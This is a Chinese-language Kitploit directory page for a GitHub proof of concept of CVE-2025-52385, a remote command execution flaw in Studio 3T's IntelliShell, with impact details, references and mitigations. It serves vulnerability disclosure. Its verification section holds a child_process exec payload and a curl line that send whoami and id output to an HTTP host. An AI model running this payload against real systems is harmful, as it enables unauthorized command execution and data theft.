Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-52385 — Studio 3T v.2025.1.0 | Kitploit
工具/GitHubGitHub/kov404/cve-2025-52385
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T v.2025.1.0

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-52385

软件: Studio 3T v.2025.1.0

漏洞报告: Studio 3T 远程命令执行

概述 Studio 3T 版本 2025.1.0 及更早版本中存在一个严重漏洞,允许远程攻击者通过利用 IntelliShell 组件中的 child_process 模块构造恶意载荷执行任意代码。

详情 漏洞类型: 远程命令执行 受影响产品: Studio 3T,版本 <= 2025.1.0 受影响组件: IntelliShell 攻击类型: 远程 影响: 代码执行: 是 拒绝服务: 是 权限提升: 是

描述 该漏洞使远程攻击者能够通过 IntelliShell 发送恶意 JavaScript 载荷,利用 child_process 模块执行任意操作系统命令。这是一个盲执行漏洞,意味着攻击者无法直接获得输出。 攻击向量

建立与 MongoDB 实例的连接。 通过 IntelliShell 发送恶意 JavaScript 载荷,利用 child_process 模块执行任意操作系统命令。

验证概念 要验证该漏洞,请执行以下步骤:

搭建本地 HTTP 服务器:python3 -m http.server 80

在 IntelliShell 中执行以下 JavaScript 载荷: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

或者,使用以下命令作为验证向量:curl http://site/$(id) 参考

Studio 3T 官方网站

Studio 3T GitHub 仓库

CWE-78: OS 命令注入

CWE-94: 代码注入

缓解措施 用户: 升级到已修补的 Studio 3T 版本(如有),或避免对不受信任的 MongoDB 连接使用 IntelliShell。 供应商: 限制或清理 IntelliShell 中 child_process 模块的输入,以防止未授权命令执行。

致谢 该漏洞由 Kaio Mendonca Pereira 发现并报告。

下载工具